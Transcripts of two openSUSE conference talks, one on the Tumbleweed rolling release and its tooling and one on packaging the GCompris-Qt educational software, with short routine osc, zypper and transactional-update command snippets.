They have this mantra of the Arch way, which gets summed up as: do it yourself, it's a learning exercise. Not my way of doing things, but it works. The Arch Wiki is a wonderful bit of documentation. And then of course you have the Gentoo way, which is basically the same, it just takes longer because you're compiling. But that works for guys at the bleeding edge really, really working on this upstream stuff. It doesn't work even for most enthusiastic users. We have too much other stuff to do. We don't want to be hacking around with the inner workings of our distribution. We want something that we can just install and work with, and get the latest of everything, because we want to have our cake and eat it too. And we need some way of stopping this "something's changed and I have to spend three days hacking around my system to fix it and get it working the way it's meant to work". And in openSUSE, we've asked this question: why do rolling releases need to be difficult? And obviously with Tumbleweed, we think the answer is: they don't. But Tumbleweed didn't start out as the Tumbleweed we now know and love. It was started originally by Greg Kroah-Hartman in, well, before 2014. I can't actually find the exact date when it started. And as you know, it's providing the latest updates. The kind of key point there is: at the pace of contribution. Tumbleweed runs as fast as our community makes it run. Sometimes that means incredibly quickly. Sometimes that means we actively decide to do things at a slower pace, because we think that's the best way of handling what that upstream project is doing. It's tested by OpenQA. And in terms of that kind of user-base focus, we're really targeting that developer, contributor, enthusiast part of things, because that's really where rolling releases really, really shine. But old Tumbleweed wasn't like that at all. Tumbleweed originally started with a model of taking the base system of the openSUSE we were shipping at the time and putting rolling updates on top of that. So instead of having a separate release, it was really an add-on for an existing release. It had a very particular focus. Obviously, Greg Kroah-Hartman's a kernel hacker, so he started with the kernel, and then the community started building up on that, and things like KDE and GNOME and some applications got in. But that model of sitting the two on top of each other meant that the only way of delivering software was to overwrite the packages from the original base system, which meant every time we released a new base system, a new version of openSUSE, your only choice was resetting everything in Tumbleweed to zero, which was a really dramatic change, because any customizations that had been sitting in the Tumbleweed bit suddenly disappeared and vanished. Sometimes packages rolled backwards, or just ended up with different config, or, yeah, it was always a painful mess. That wasn't the only lesson we learned from that. I think the key lesson we learned was: partially rolling distributions don't really work, not in a general sense. In a very narrow sense, in a very specific, you know, small narrow use case with small narrow changes, I think you can make it work. But in terms of a broad general-purpose distribution, it just constantly fails, because that rolling top constantly needs new requirements from that stable base, and you can't change your stable base — it's stable.
So you end up having to come up with nasty little hacks, you end up tinkering with the stable base, you end up linking stuff in weird and wonderful ways, and it just falls apart every single time. And even if it didn't, you still have that reset to zero every eight months with a new release, which is brutally disruptive for users. I sum up this lesson as my rolling release rule, which I think Tumbleweed solves better than anything else: to be able to move any one thing in a Linux distribution quickly, even some weird library on the far end of this massive code base, you've got to have your tools, processes, and technology in place so that you can change everything. Be prepared to throw out the entire distribution and start again just to get that one new library in there. And we've done that with Tumbleweed, not just on its own, but with the tools we have. We couldn't do this without the build service. It's a key part of everything we're doing; we just had a presentation about it earlier, so I won't go on about it again. But the build service, the way it works, the fact that we can track all of these different dependencies in all these different locations, link them all together, and rebuild them when they're needed, makes sure that you have a consistent view of the distribution, built cohesively together all of the time. But building is fine; you need to make sure it works as well. And of course, we have openQA. It originally started in 2009 for testing the basic installation part of openSUSE, and it's become an absolutely key part of the Tumbleweed release process. A single Tumbleweed update doesn't happen until it's been tested by openQA. It's also a key part of the Leap process. It's now also a key part of the SLE development process. And it's even used by Red Hat for testing Fedora. I haven't got them using it for Red Hat itself, but I'm working on that one. Hopefully one day. I'd like to steal their tests. With openQA, you get these nice dashboards of all these different scenarios. So we're not just testing one basic, boring use case, but different ways of installing the distribution, different RAID configurations, different desktop environments, different architectures, although that isn't shown on the screen here. In a deeper view, the tests break down into exactly the steps being done by the test. And the key part here is that it's not testing artificially, just poking around some APIs or calling very particular scripts to do very particular things. The tests are written to exercise the software the same way a user is going to use it. So when you're talking about that conceptual problem of being aware when your software is changing in a way that a user might be impacted, that's exactly how openQA is testing this. It can be a trivial change like a wallpaper or a login screen where we've changed the color: openQA at least makes us aware that that's happened, it flags it up, so we can decide whether this is the right thing we want or not. If it is, we click next, it moves on, everything's fine.
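As a quick aside for anyone who wants to try this tooling themselves, here is a rough, hedged sketch of branching and locally rebuilding a Factory package with osc; the package name is only an example, and the repository name in your branch may differ from what is shown:

# branch an existing Factory package into your home project (package name is illustrative)
osc branch openSUSE:Factory some-package
osc checkout home:$USER:branches:openSUSE:Factory/some-package
cd home:$USER:branches:openSUSE:Factory/some-package

# make your change, then rebuild locally instead of burning OBS worker time
# (repository name and architecture depend on how the branch was set up)
osc build openSUSE_Factory x86_64

# when it builds and works, upload it and send it back as a submit request
osc commit -m "fix whatever was broken"
osc submitrequest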
And that is all then tied together into the Factory development process, where we have this pipeline of code submissions going to Tumbleweed: they initially get automatically reviewed in the build service, then tested in a process we call staging, where we make sure, in isolation, does this one little thing work on its own? If it works fine on its own, that's the point where we start involving humans and have someone doing a proper review of the submission: does this actually work? At that point it is put into Factory. So you have the full, large code base, 10,000-plus packages all built together, all consistently integrated in one big pool, which we then test again in openQA in a much more intensive fashion. And that then gets pumped out at the end as Tumbleweed. That means if you want to change something in Tumbleweed, you've basically got two very easy ways of doing that. One: just contribute to openQA. Writing a test to make sure that openQA is checking that one thing you really care about means that every single Tumbleweed snapshot will be checked to behave the way you want. You don't really even have to worry about packaging anything or coding anything. If you can describe in an openQA test what you want to stay that way, it will stay that way. Or at least it will stay that way until it breaks, and then we'll figure out the best way of getting around the problem; at least it means we're aware that that use case has changed. Or, if you're more packaging-aware, there is the Factory submission process: obviously, contribute to Factory. That is how Tumbleweed works. When I talk about all this tooling and these processes, especially to upstream developers or new people to the project, I always get the same responses: that's cool, it's great, you're doing all this stuff fast, but I don't want to wait for that build or the test nonsense. I'm an upstream developer, I've just got my tarball, how can I run it really, really quickly? That happens a lot, especially with people embracing stuff like Snappy. But the process works at a ridiculous pace. I just realized I still haven't fixed this slide; I got the number wrong on it. GNOME 3.22 is an example. The upstream release of GNOME came out, and within less than 48 hours we had it fully integrated, fully tested, and shipped in Tumbleweed, every single package. And it worked. We had very few bugs, very few issues, users universally happy. When we did have a few issues, they got fixed the next day. In the case of KDE Plasma 5.9 (not 4.9), we even shipped it on the upstream release day. In the upstream release process for KDE, we actually get the tarballs a few days earlier, so we were able to do all of the testing and pre-work in advance, and we just hit the button when it was ready and it went straight out. If that's still too slow for you, thanks to the build service we've got these separate incubator-style projects where we can have derivatives of Tumbleweed built straight from the git repositories of these upstream projects. Things like GNOME:Next or openSUSE Krypton, where every single commit from GNOME or from KDE immediately spins out new versions, built Tumbleweed-style, tested Tumbleweed-style, and they're there right away. It's all nice to brag about two simple examples, but it's not just a case of the specific stacks we're interested in. Is Dominique here?
I guess not, because he knows all this stuff anyway. But Dominique Leuenberger, our release manager for Tumbleweed, every week writes a report to the community about what's been going on in Tumbleweed that week. A year ago now, he made this comment that it had been a quiet week: there wasn't really that much, and the report was shorter than usual. And that got me curious about what a quiet week is for Dominique. That week was this: three snapshots. That's three different software releases, basically the equivalent of a point release of a regular distribution. Collectively, those releases included 146 new package updates. It included a new kernel. He changed a whole bunch of stuff on the DVDs that we ship. That's quiet. It's ludicrous, an insane amount of change for one week. In fact, a couple of weeks later it was twice as much, and two weeks ago it was three times as much as that. The pace is still accelerating. The process still works. It scales out because we have more and more people using it. The tooling works, so we can do huge amounts of changes in a relatively short time, keep pace with all of that, and still make sure we're shipping something to the users that actually works. That works from our perspective, and it works from the perspective of what upstreams are trying to deliver. Users might have different opinions. But this is where we have Btrfs and Snapper. Because we've got Btrfs as our default file system, and because we ship Snapper as our tool for taking a snapshot every time you do an update, the whole problem of "something changed in a way I don't like" is immediately taken care of. You can update Tumbleweed every single day, and if you then find out it's not working the way you wanted, you can always roll back to yesterday's snapshot and just work from there. Get your job done. Even if we break your machine, not that that happens, you can even do that from GRUB. Even when the system is booting, it just works. That's great. But what about development? What about openSUSE Factory? What about the dev branch approach? Once we started putting Tumbleweed together in this way as a real rolling release, that became the next question. What do we do about Factory? We don't need a development branch. We don't have a development branch in the purest sense anymore. There is no crazy rolling untested head for someone to mess around with, because Tumbleweed is keeping up so well that we can give our developers something that actually works all the time. They're always going to be close enough to know what's going on in everything they're doing. They don't need Factory anymore. It's still there in terms of the process; the process is the Factory process, but the output of that is Tumbleweed. That's what people use. I've been talking about rolling releases all this time. What about an openSUSE regular release? It's a simple truth that a couple of years ago a huge amount of our community were very much focused on the kinds of concepts I've been talking about so far today: rolling releases, delivering quickly, Factory or Tumbleweed. The enthusiasm for a traditional regular release was fading away. The cool thing is, because of Tumbleweed, we've been able to do really exciting things with the regular release that we were too scared or blind to think about before.
With Leap, we're able to have that nice, stable SUSE Linux Enterprise code base as a nice, stable, regular release: the polar opposite of Tumbleweed, a completely different use case for completely different people, appealing to completely different contributors. Then, because we're using the build service, because we're using openQA, because we have all of these tools and techniques we've been honing for years, we can still take the parts from Tumbleweed that make sense and layer them on top, but do so in a process where you don't get that nasty issue of rolling and stable breaking each other, and ship a nicely, cohesively tested Leap. In the past, openSUSE always seemed to be split. We had a community where some people wanted us to go faster and some wanted us to go slower. We can do both now. Tumbleweed is the fast road, Leap is the stable one. They serve different users, they both work perfectly fine, and they actually help each other quite well, because SLE is based on what we're doing in Tumbleweed. All SLE engineers are developing on Tumbleweed, and their work then filters into both Leap and SLE from there. Just like that slide there. From a cross-section of the whole thing, you end up with a picture like this, where Tumbleweed is over 8,000 packages (it's actually over 10,000 packages now) as a rolling base system with its own unique code base, and then Leap and SLE sharing a common core and overlapping between the two. This is how things are developed. I really should have updated the slides, because I've just noticed the number is wrong. Tumbleweed is rolling along constantly, constantly changing at its own pace. Then next year, as we already announced, there will be a new code base to replace the current one we are using for SLE 12 SP3 and Leap 42. There will be a core 15 (not 13), and there will be SLE 15 and Leap 15, all originating from what we're doing in Tumbleweed, frozen from there, polished up, tightened up, et cetera. It's great. It's wonderful. It's great from a rolling release perspective of getting things into the hands of users quickly and working with upstreams fast, and it's a key part of how we're building the more stable, enterprise-focused stuff we're doing at SUSE and openSUSE. It all starts in Tumbleweed; that's the main code base where this stuff all works. It's wonderful, but it's not perfect. There are a few things in Tumbleweed we really need to get fixed. To start with, this is the only sensible way of patching your Tumbleweed machine: zypper dup --no-allow-vendor-change. Not enough people know that, even though it's the first thing you read in the documentation these days. That's mainly a knock-on effect of how Tumbleweed is built and how users are using Tumbleweed with OBS. The traditional zypper up command is way too conservative. It always assumes versions only go up, so it doesn't work when upstreams change their version numbering, and it doesn't cope comfortably when dependencies change dramatically. It works fine for the regular release update approach, but it isn't good enough for a rolling release. zypper dup, which you would think would be the right solution for doing the same thing but changing a whole operating system the whole time, ends up being a little bit too liberal.
Quite often, especially in the presence of additional repositories, there's nothing stopping zypper dup from grabbing packages from another OBS repo that you've set up on your machine and then using that to overwrite all of the stuff you have from Tumbleweed. zypper dup --no-allow-vendor-change is the happy medium in between: you get the looser dup approach of looking at the latest version, getting the latest version, and putting it on the system, but the no-allow-vendor-change part means it will try its best to keep each package coming from the repository (the vendor) the user originally chose to install it from. So if you're only using Tumbleweed repositories, zypper dup only pulls Tumbleweed packages in. And if you're picking one thing from OBS, zypper dup --no-allow-vendor-change will keep pulling that one thing from OBS and not accidentally pull through the 20 other things that happen to live in the same repository. But it's way too obscure and way too long to type. I know there are millions of Tumbleweed users out there who don't do this. And then their machines break, and then they're on the forums. Yes. Yes. And there's a zypp.conf option for that; I'm just getting to that part. So it is obscure and too long to type. I'd like us to think about either changing the default behavior of zypper dup (for example, inside SLE we also use a variation of this for the zypper migration routine, with a few extra variables there for SLE, but it's clear that zypper dup on its own is too liable to break stuff), or having a variation, maybe specifically for Tumbleweed, something like a "zypper twup". Or, like Derek said, you can actually change a single line in your config file to make this the default behavior. Maybe we should be doing that in Tumbleweed. Even when we solve that problem, and it's not that hard to solve, we just need to decide how to do it, we then also need to fix or remove the graphical update tools that Tumbleweed is using: YaST and PackageKit. Because right now, you go to YaST, you try to do an update, and it doesn't really know what to do. It doesn't have an equivalent of dup, it doesn't have an equivalent of dup with no-allow-vendor-change. It tries to do a zypper up, which will work most of the time when things are quiet, but when there are big changes and big dependency changes, it falls over, it breaks, it doesn't work. And PackageKit is a whole other layer of problems on top of that. So I'd really like to see us fixing those tools, or if we can't get them fixed, removing them, so users don't get confused and start wondering why their GNOME update applet keeps telling them to update and then not working properly. Yes. Yeah. The question is, why don't we just make a script to do that? That's definitely one option we could take. The problem there is that people have quite a lot of update scripts already, for example, as it happens, in the case of transactional updates. Transactional updates are a new technology we've got in Tumbleweed. You can learn much more about them in this room at 5:15 today, because Thorsten is going to talk about it.
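For readers following along at home, a hedged sketch of the commands and the config change being discussed here; the exact option name in zypp.conf is from memory, so double-check it on your own system:

# the recommended way to update a Tumbleweed machine
zypper dup --no-allow-vendor-change

# plain "zypper up" is too conservative for a rolling release, and plain
# "zypper dup" may happily switch packages to other repos (vendors)

# to make the vendor-sticky behavior the default, there is a solver option
# in /etc/zypp/zypp.conf (name from memory, verify before relying on it):
#   solver.dupAllowVendorChange = false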
But the short and simple version is this: with the update model and snapshot model we currently have, you take a snapshot before updating your system, then you update, and you take a snapshot after, so you can compare before and after and roll back to figure out what went wrong. That has quite a few negative side effects, one of them being that you end up with a load of snapshots on your machine, and it's also not the cleanest, crispest way of keeping track of what's really going on in your system. With transactional updates, in the simplest form, the update is done into a snapshot on Btrfs. It doesn't touch the running root file system: it creates a snapshot, makes all the changes in there, and when you reboot, that's the snapshot you boot into, so all your updates are there. It's completely atomic. Either it all works, or if it doesn't, you just roll back the whole snapshot and nothing got changed. It's already in Tumbleweed, and it's implemented as a script. So if we change zypper dup, we have to change this, or we can keep on using this. Yes. Yes. Quite often, in fact; the last time I rolled back was when I accidentally did rm -rf in the wrong folder. I haven't had to roll back because of a patching issue, but rolling back happens quite often with me, actually. But for transactional updates to really work, and this is a technology in Tumbleweed that really excites me, I'd actually like to see us think about making it the main update mechanism in Tumbleweed one day, because Thorsten is talking about it in the context of Kubic, a variation of Tumbleweed. To get there for all of Tumbleweed, we really need the packages to be a bit more compliant with our own packaging guidelines. The things that break this approach are things like packages putting stuff in /srv, or packages messing around with user data, things that aren't going to be in that snapshot when it's patching in the snapshot, and then the whole thing falls apart and everything dies. We're not that far away from it, in fact. With the Kubic stuff we're talking about later today, Tumbleweed is already being tested alongside it, so we can see when packages break it. But yeah, long road to go. Snapshots are great, funny we were just talking about all of that, but they're only a temporary workaround. Once you've rolled back, you're back to exactly how you were yesterday, but Tumbleweed still moved on. So you can't install anything, because the repository only has the new Tumbleweed packages and not the old ones you rolled back to. I'd like us to look at the possibility of retaining old snapshots in the Tumbleweed repos. I'm not entirely sure how we'd do that; maybe fancy symlinks, fancy snapshotted versions of the repository. Like I said, I'm not sure, and it could be a logistical nightmare. But if we find a solution to this, we could really have this utopian vision of Tumbleweed moving at full pace and users able to pick what pace actually suits them.
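To make the transactional-update mechanism described a moment ago a bit more concrete, here is a hedged sketch of how the tool is typically driven; subcommand names are from memory and may differ between versions:

# apply a full distribution upgrade into a new Btrfs snapshot,
# leaving the running system untouched until the next reboot
transactional-update dup

# install a single package the same way (package name is hypothetical)
transactional-update pkg install some-package

# the new snapshot only becomes the running system after a reboot;
# if it misbehaves, boot the previous snapshot from the GRUB menu or roll back
transactional-update rollback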
Coming back to that idea of retaining old snapshots: if users don't want to upgrade to the latest of everything immediately, but want to take a week or two, or a month or two, longer to keep up, then if we kept those old snapshots around in the build service and on download.opensuse.org, users could still have the snapshot version they want, get the packages that were built for that version of Tumbleweed, and we'd have the best of both worlds. Everybody's happy, everything works. Obviously, besides the logistical issues and the fact that I don't have all the answers for how we'd do this, it would also mean our mirror hosts would have to host a huge pile more packages. But Tumbleweed is actually surprisingly small when it comes to our mirror infrastructure. We've got four terabytes now, I think, generally speaking. No? I need to check. There are terabytes of stuff on our mirrors. Nine? Nine terabytes. Okay, nine terabytes, not four. Nine terabytes for most of our mirror infrastructure, and that's all of OBS, all of our distributions, et cetera. Tumbleweed is about 60 gig of that. It's relatively small. It's a very fast-changing 60 gig, but it's a tiny part in comparison. So doubling or tripling it, especially since the additional size isn't going to change the churn rate much (these are old snapshots, they're not going to be changing), our mirror hosts shouldn't be that concerned about a few extra gig when they're holding nine terabytes already. And that's something else I'd like to see fixed in Tumbleweed: we need more tests. I already gave you the sales pitch earlier, but we really, really need more tests. If you find something in Tumbleweed you don't like, a bug, a behavior you dislike, whatever, write a test for it. The documentation is there, we accept pull requests, it's all on GitHub. We will merge that test, we will run that test on Tumbleweed, and that problem will never happen again without us knowing about it first. That's fine for the generic stuff. Then there is the second problem of how the heck we test Nvidia, because openQA is typically VM-based, and you don't have Nvidia cards in VMs. We do have some options for testing on bare metal. That's normally using stuff like IPMI, which means you're talking over serial and VNC, which isn't looking at an Nvidia card. So I'd love to have people thinking about how the heck we can test the Nvidia drivers, or any graphics drivers really, but Nvidia is the one that breaks all the time on Tumbleweed, so I'm just going to pick on them. It's theoretically possible. Like I said, we have support in openQA for handling different architectures and real hardware. It's all flexible on the back-end side of things. We just need a little bit of help figuring out how to make that happen. Because if we can get things like third-party hardware drivers tested in openQA, Tumbleweed will gain a whole other class of user who right now can't really touch it, because they're unfortunate enough to have a laptop or desktop with an Nvidia card in it. And then last but not least, the non-technical thing I'd like: I'd like to hear how people are using Tumbleweed. We've got to do a better job of marketing this. I can talk for hours about how I think the process is wonderful, and for hours about what I'm using it for, but what is the rest of the world using it for?
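Going back to that call for more tests for a moment: a hedged sketch of where those test pull requests go; the repository URL is from memory, so verify it before cloning:

# the openSUSE test distribution for openQA lives on GitHub;
# new tests are contributed via ordinary pull requests
git clone https://github.com/os-autoinst/os-autoinst-distri-opensuse.git
cd os-autoinst-distri-opensuse
ls tests/    # existing test modules, useful as templates for a new one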
The reason I care is that with Tumbleweed, you've got a way of getting open source software into the hands of users quicker than anyone else, more cohesively engineered than anyone else. It's not just a server OS. It's not just a desktop OS. I know we've got people running it on Raspberry Pi. I know we've got people doing crazy robots and stuff, like the other talk happening in the next room right now. I want to hear about this so I can help get people writing case studies about it, writing blog posts, spreading the word. Because that's what's really exciting about Tumbleweed: it's a unique platform for doing cool stuff with. So please, there's my email address, send me stuff. I promise I will help spread the word about it. So, in review, who should be using Tumbleweed? Developers. Any developer. Whatever upstream project you're working with, you want to be getting the latest and greatest stuff. Use Tumbleweed. It just works. It's stable. If it doesn't work the way you want, just roll back using Snapper. And if it's not quite perfect, you're a developer: you can help us fix it. If you're an upstream developer in particular, targeting Tumbleweed is a great way of making sure your software gets into the hands of users quicker. And our tools, the build service and openQA, are there to help you do more than just that: you can do it with us first and then build it and test it for every other distribution too. openQA isn't just an openSUSE thing. OBS is building for every other distribution. We're even building AppImages and other containerized stuff in there now as well. Ultimately, those formats are more work at the moment than traditional packaging done right in OBS, so why avoid traditional packaging when you can do it right in OBS? And then as a user: you want the latest and greatest of everything, Tumbleweed just works, and we would love you as a contributor. And when you become a contributor, like I've already said twice now, the openQA process and the Factory process, one sort of reactive and one proactive, let you make sure that Tumbleweed is shaped exactly the way you want it to be. And if you do that and you join us as a direct contributor to Tumbleweed, it's not just going to be helping you out. The Tumbleweed user downloads are going higher and higher and higher. This is the last few years. Just to explain the graph, because I notice it doesn't render that well: the blue line along the bottom is our old development branch. The orange line is old-fashioned Tumbleweed. The green line is the sum of both of them, because we had a dev branch and a rolling add-on and did the two things in parallel. So we had a few thousand users, but not a huge amount, on those two different platforms. Then we merged them together and started doing this. And as you can see, since the end of November 2014, it's gone crazy. And I want it to keep on going crazy. I want more users on that. I want to be able to show this graph next year twice as high. So please, thank you, and help me. Does anybody have any questions? Yeah. There's a microphone there if you want, so everyone can actually understand you. So it's a question about how to test Nvidia: have you tried PCI passthrough with the virtualization solutions? In theory; I've messed around with it a little bit, but none of the openQA hardware I have has an Nvidia card in it. Haven't got the hardware for it. But yeah, in theory, that would work. Any more questions, comments, et cetera?
Cool. Thank you very much.
Rolling Releases are the future of Linux distributions. They are already the better solution for power users & developers. Tumbleweed is the future of Rolling Releases. The methodologies, techniques, and capabilities of Tumbleweed are opening up new doors, creating possibilities, and disrupting existing technologies beyond its borders. This session will explain how and why openSUSE Tumbleweed is paving the way for that future, while already being "the reliable rolling release". The talk will dispel the fears, uncertainties and doubts that many have regarding rolling releases in general and Tumbleweed specifically, and share how you can get involved both using, and improving, this exciting fast moving foundation of the openSUSE Project. But not everything is perfect. This talk will also identify some rough edges in Tumbleweed and suggest collaborative solutions as to how the openSUSE Project could start addressing them, so we can continue the exceptional progress Tumbleweed has made into the future and beyond the year 2020.
10.5446/54478 (DOI)
Thank you for coming to my talk. We will discuss the journey of GCompris-Qt, which is the new version of GCompris, a piece of software for kids from roughly 4 to 12 to play with and interact with a computer, with more than 100 different kinds of activities. And then we will discuss how, in openSUSE, we take upstream sources and try to deliver them directly in Leap for end users. So my plan will be: no plan. Don't have a big plan when you want to start packaging. It should be a fun activity, and you will learn a lot of things along the way; it's just a journey. So don't make big plans or anything like that. About me: I've been an openSUSE user for almost 15 years now, which doesn't make me younger, and I've been packaging for 7 years. Globally you will find me supporting different projects like PostgreSQL, various openSUSE things of course, I'm an FSFE Fellowship member, and I support KDE through their sponsoring program, I don't remember its name. I'm living in Switzerland, but I'm French, sorry for the accent. Just a word about my slides: the dark green ones like this will be the GCompris-related ones, and the flashy green ones will be more advice and comments about how packaging works. For those who don't know how code becomes software that end users can install on openSUSE: mainly, we pick up the sources, we write a spec file, which is basically a recipe, then we build from this recipe on OBS or locally, we will see. That produces RPMs, which are the installable artifacts, and those RPMs finally get published inside a repository. That's the first part. For the second part, to get all the way into the distribution, we have to submit those packages to Factory, the Factory process. They get reviewed, after some time they get accepted into Factory, they flow through openQA (but optionally, only if you have tests for that), and then they finally get published. So the first question is: why would I start packaging? Because most of the time it's a fun story. One of the primary reasons would be: I need this software and it's not yet packaged, and you will certainly find a reason like that. For GCompris it started two years ago during a Randa Meeting in Switzerland, which is one of the sprints KDE organizes. I met again one of my friends, Bruno Coudoin, so it's Bruno and Bruno working together; well, not working at that time, we were drinking together. The GCompris project had just finished its port to Qt at that point, and I proposed that we try to publish the software to end users. So for packaging, you have to find your challenge and choose a piece of software, but I would recommend knowing the upstream quite well, because you will have to interact with them. You will have to be your own first user, because you will compile the software, you should be able to tell whether it works or not, and then you will perhaps be able to patch sources, propose modifications, and create bug reports upstream. So the relationship you have with upstream is quite important. We started collaborating one morning, and I remember that at that time they were only offering tarballs in gzip format, and I asked Bruno: hey, could you try to publish them in xz format too? He finally said: yes, but why? I told him: you will see that the xz format takes 15 to 25% less storage, which doesn't change GCompris's life that much, but 25% less storage on OBS and then on all the mirrors is quite a lot. So they decided yes. So that's collaboration with upstream.
You sometimes have to propose changes to their workflow just to make things better for you. Unfortunately for me, the next discovery was that some dependencies were not yet on OBS, so we would have to fix that. That's a common problem when you start packaging: you say, great, I would like to package this software, but in fact it depends on something, and that something is not yet on OBS, so you will have to package those dependencies first. So before starting, have a look at how many of those dependencies already exist on OBS, because you have to be ready to solve them, to build every dependency you will need. And you can find some nasty cases where one package ends up with a total of 80 dependencies; hello, pgAdmin 4. This can drive you into a loop, because by the time you've packaged the first level of dependencies, hopefully there is no second level, but perhaps there is a second level, and then a third, and you are still not packaging the software you actually wanted. In my case, for GCompris-Qt, there were thankfully only two: Box2D, which is a physics engine used for game animations, and QML Box2D, which is the Qt binding to interact with it. Both of them are really low-maintenance, with roughly one release every three years, so I was quite happy on that side. So I started by packaging those two dependencies first. When you are packaging and you want to go all the way to Factory and publish the software to end users, you have to find a home for your project. We call that a devel project, because any package in Factory needs to come from one of these devel repositories. We have a well-defined set of them, and you can only submit a package to Factory if it is present in one of those. Perhaps a problem for a newcomer is finding the right devel repository; we have a lot. And it's not that easy to know: my package is a bit of Python, but I have C, but in fact I am a game, or could it be an education project, and so on. For finding the right home on OBS, I don't have the perfect tool. Perhaps ask on the mailing list: OK, I'm packaging this, it mainly does that, what is the best devel repository I can choose? Your dependencies can live in other repositories. In my case, for example, Box2D was a pure C++ library, so it went one way, and QML Box2D was more related to Qt, so it went to the Qt repository. GCompris went to the education project, because the old version was already there. Then you will discover the different ways of life on OBS. Normally everything should be uniform, but not all devel repositories are alike. You may find a home, but inside this home the maintainers may still want to build for a whole list of extra targets, and your package will have to build for those targets too. I guess most of this is getting better and everything is starting to be normalized, but you will have to deal with how the maintainers of that repository want their software handled. So finally we can start the real work: we write the spec file, which is our recipe for how the software is built, where its sources come from, what license applies, and so on. We have great tools for that: osc, which is our main command-line tool, and its mkpac command to create the package skeleton. And you can use a simple editor like vi.
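As a hedged illustration of what starting the real work can look like on the command line (project and package names are only examples, and your workflow may differ):

# check out your home project and create a new package in it
osc checkout home:$USER
cd home:$USER
osc mkpac gcompris-qt

# drop in the upstream tarball and a spec file, then register and upload them
cd gcompris-qt
cp ~/Downloads/gcompris-qt-*.tar.xz .
vi gcompris-qt.spec
osc addremove
osc commit -m "initial packaging"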
If you use Vim to create the spec file, it will automatically fill in a nice empty spec template for you, so the main sections are already laid out. Once you have the spec file, you start building the package and see whether it builds. For that we can again use the osc command line. We can build inside a VM, so locally, but inside a VM, which is exactly the way OBS will build the package, or you can also build in a chroot. The chroot can help when debugging the build, because it's easier to go into the chroot and understand why it doesn't find the files or libraries it should. For the build tools, we have the Bible: go to the wiki. Normally everything is there, and it points to the different kinds of packaging we have, like Python, Perl and so on. You will have to set up your own OBS account, which is mainly done automatically when you create an account on OBS, and you will have to install and configure the osc command line. I would like to insist on one thing: when you start to build something, try to stick to only one platform and one architecture. If it doesn't build for, say, Tumbleweed on 64-bit, you don't have to care yet about s390, the ARM platforms, or the Leap versions. First get the software building on at least one platform and one architecture. Why am I saying this? Because we have to be good citizens and collaborative on OBS. It's a wonderful system; there are more than 800 workers. But we build a number of projects hosting a huge number of packages in a huge number of repositories, and this is still growing. So when my friend Dominique is rebuilding, for example, Factory for the new GCC 7, OBS will be fully busy for four or five days. There is not that much spare power on OBS. So spare the build power and build locally; that's why we can build locally, and it's quite easy. For example, GCompris builds on OBS in about 200 seconds; locally I build it in almost 100 seconds, so it's two times faster, and I don't have to wait for OBS to see whether it builds or not, at least while I'm developing. My last step is: OK, now I send all my changes to OBS and check whether something breaks on one of the platforms, but not before. So yes, try to limit the number of architectures you build against. So there came a time when I finally got my first submit request accepted. Wonderful: the package was accepted into the education project, and GCompris was finally available. I started to advertise the package to some friends with children so they could test it, and quite quickly I got news from them: the package doesn't work, it starts but nothing appears on screen, things like that. I was quite worried, because I had tested it locally on my machine and it was working. In fact, the catch was that I was missing some runtime requirements. So don't get caught like me: never use your dev machine when you test your package. Build a new VM from scratch for that. And if you are using KDE like me, then put GNOME 3 on this test machine. That's exactly what happened: my friend Nicola was using GNOME 3, and my package was missing some Qt5 requirements to make it work on different desktops; I just happened to have almost every library already installed on my own machine. So try to treat your package the way end users will one day, and then it will work. I would like to thank Nicola for reporting the bug and testing the package.
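A hedged sketch of how you might catch this kind of missing runtime requirement before your friends do; the option and file names are from memory and only illustrative:

# build locally, keeping the resulting RPMs in ./binaries
osc build --keep-pkgs=./binaries openSUSE_Tumbleweed x86_64

# inspect the declared runtime requirements of the freshly built package
rpm -qp --requires ./binaries/gcompris-qt-*.rpm

# then install it in a clean VM (for example a default GNOME installation) and actually start it
sudo zypper install ./binaries/gcompris-qt-*.rpm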
And Fabian from the KDE maintainer team helped me and said: hey, you know, you need this requirement to make those Qt5 libraries available to all users. Then, once your package is on OBS, you will perhaps get some improvements from other people. That was the case: Jan proposed to split the voices out of the main package so they don't get rebuilt. Any time a dependency changes or something like that, GCompris-Qt gets rebuilt, and if we keep the voices, which are 300 megabytes, inside this package, every source package will contain the voices and we multiply the data. So the voices went into a noarch data package which basically stays at one version and doesn't get rebuilt. You will have to manage those changes and proposals from others and work together, which is a good way to learn. So everything was perfect. The software exists. Users can install it. But no: this is a real screenshot of a user installation, and it has 61 repositories enabled for openSUSE. That hell is what we want to fix. So the next step: why make the Factory submission effort? This push started about a year ago, saying that we should not force users to add additional repositories. Our repositories are for development. Repeat after me: they are for development only. So the last step was: OK, let's move that package to Leap. That means submitting the dependencies until they are accepted, and then the software and the voice data, which should be easy now. In fact, not. A few minutes after the submit, the submission was refused by one of our review bots because of a broken license. The voice package had no proper license, in fact, and upstream had to fix that. So I opened a bug and worked with them until they had recontacted everybody who had contributed voices for GCompris and fixed the licensing, so they could relicense everything under one unified license. And now they have a guideline that says: if you want to propose a new voice for GCompris, it is under this license and nothing else. So I resubmitted. OK, that's perfect, review in progress, time passes. I was a bit busy, but yeah, time passed and passed, and 42.2 was released. In fact, the package had gone into a dead end in some review in the legal queue. At that time, the Haskell packages arrived with 3,000 new packages in the legal queue that had to be reviewed, and my poor GCompris request got a bit lost inside this dead end. With the help of some friends, and by contacting the Factory maintainers to ask why it was still in this queue when there was no more reason for it, it finally got accepted into Tumbleweed. Then the Leap bot asked me whether I wanted to bring that package to Leap for 42.3, and I said yes. And everybody can now enjoy GCompris on their computer, especially on openSUSE. And then it's time to ask whether you have questions or things to share. There are a number of talks during this event that cover more or less the same problems in the same way. If you start with some, I would say, non-compiled software, something in Perl or Python, it can be quite easy. Starting small is quite easy, so don't be afraid of it; my case was a bit of an exception. Questions? Sharing? To recap the timeline: the package and the dependencies were made in less than 10 days, not working on it all day, just in spare time. The first submit to the education project took, I guess, four hours: I submitted it in the evening and in the morning it was accepted, something like that.
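For reference, a hedged sketch of what those submission steps look like with osc; project names and the request number are purely illustrative:

# submit the package from your home project to the devel project (here: education)
osc submitrequest home:youruser gcompris-qt education

# once it lives in the devel project, submit it on to Factory
osc submitrequest education gcompris-qt openSUSE:Factory

# later, check where the request is stuck (review, legal queue, ...)
osc request show 123456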
